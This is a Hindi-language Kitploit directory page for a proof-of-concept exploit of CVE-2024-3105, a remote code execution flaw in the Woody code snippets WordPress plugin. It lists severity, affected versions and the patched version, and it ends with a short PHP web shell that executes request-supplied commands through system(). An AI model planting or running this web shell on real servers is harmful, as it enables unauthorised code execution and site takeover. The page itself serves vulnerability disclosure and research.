Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3105-PoC — CVE-2024-3105 के लिए एक PoC एक्सप्लॉइट - वर्डप्रेस के लिए Woody code snippets – Insert Header Footer Code, AdSense Ads प्लगइन में रिमोट कोड एक्ज़ीक्यूशन (RCE) | Kitploit
उपकरण/GitHubGitHub/hunthubspace/cve-2024-3105-poc
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhunthubspace/cve-2024-3105-poc

CVE-2024-3105-PoC

CVE-2024-3105 के लिए एक PoC एक्सप्लॉइट - वर्डप्रेस के लिए Woody code snippets – Insert Header Footer Code, AdSense Ads प्लगइन में रिमोट कोड एक्ज़ीक्यूशन (RCE)

रिपॉजिटरी देखें
212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2024-3105 (PoC)

वुडी कोड स्निपेट्स – इन्सर्ट हेडर फुटर कोड, AdSense Ads प्लगइन (WordPress के लिए) 2.5.0 तक (और इसे शामिल करते हुए) सभी संस्करणों में 'insert_php' शॉर्टकोड के माध्यम से रिमोट कोड निष्पादन के लिए संवेदनशील है। ऐसा इसलिए है क्योंकि प्लगइन इस कार्यक्षमता के उपयोग को उच्च-स्तरीय अधिकृत उपयोगकर्ताओं तक सीमित नहीं करता है। यह प्रमाणित हमलावरों के लिए, योगदानकर्ता-स्तर और उससे ऊपर की पहुँच के साथ, सर्वर पर कोड निष्पादित करना संभव बनाता है।

जानकारी

आधार स्कोर: 9.9 CRITICAL
वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
सॉफ़्टवेयर प्रकार: प्लगइन
सॉफ़्टवेयर स्लग: insert-php
निवारण: संस्करण 2.5.1, या इससे नया पैच किया गया संस्करण अपडेट करें
प्रभावित संस्करण: <= 2.5.0

नमूना PHP कोड

root@kitploit:~
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
टूल डाउनलोड करें